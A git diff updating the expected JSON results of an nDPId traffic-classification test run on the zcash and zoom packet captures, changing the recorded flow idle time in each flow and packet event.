@@ -1,12 +1,12 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zcash.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1514196094240} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196094240,"flow_last_seen":1514196094240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196094240,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196094240,"flow_last_seen":1514196094240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196094240,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":88,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":88,"packets-processed":87,"total-skipped-flows":0,"total-l4-data-len":6805,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1514196730496} 
-00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":145,"packets-processed":145,"total-skipped-flows":0,"total-l4-data-len":11022,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1514197248783} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 145/145 diff --git a/test/results/zoom.pcap.out b/test/results/zoom.pcap.out index 17275e54f..ebb13d9eb 100644 --- a/test/results/zoom.pcap.out +++ b/test/results/zoom.pcap.out 
@@ -1,22 +1,22 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zoom.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569520466080} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569520466209,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520466209,"pkt":"AQBeAAD7KDc3AG3ICABFAABJ4i8AAAERNFzAqAF14AAA+xTpFOkANQtaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} 
00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520467785} 
